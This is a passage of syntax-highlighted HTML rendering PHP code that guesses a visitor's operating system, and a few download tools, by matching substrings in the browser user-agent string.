#82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: 
#89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">98</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 98</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.0</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span 
style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows Vista</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 7</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 6.2</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 8</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 10.0</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 10</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span><span style="color: #676E95; font-style: italic">#add a Windows 10 check </span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span 
style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 5.1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows XP</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> 
</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt 5</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 2000</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span 
style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">nt</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows NT</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">win</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">32</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: 
#BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Windows 32</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">linux</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Linux</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span 
style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">unix</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Unix</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">sun</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">os</span><span style="color: #89DDFF">/i'</span><span style="color: 
#89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">SunOS</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">ibm</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">os</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> 
</span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">IBM OS/2</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">Mac</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">PC</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">Macintosh</span><span style="color: #89DDFF">'</span><span style="color: 
#89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">PowerPC</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">PowerPC</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">AIX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: 
#BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">AIX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">HPUX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">HPUX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: 
#82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">NetBSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">NetBSD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">BSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">BSD</span><span style="color: #89DDFF">'</span><span style="color: 
#89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">OSF1</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">OSF1</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">IRIX</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> 
</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">IRIX</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">FreeBSD</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">FreeBSD</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: 
#82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">teleport</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">teleport</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">flashget</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">flashget</span><span style="color: #89DDFF">'</span><span 
style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">preg_match</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">'/</span><span style="color: #C3E88D">webzip</span><span style="color: #89DDFF">/i'</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">agent</span><span style="color: #89DDFF">))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">os </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">webzip</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: 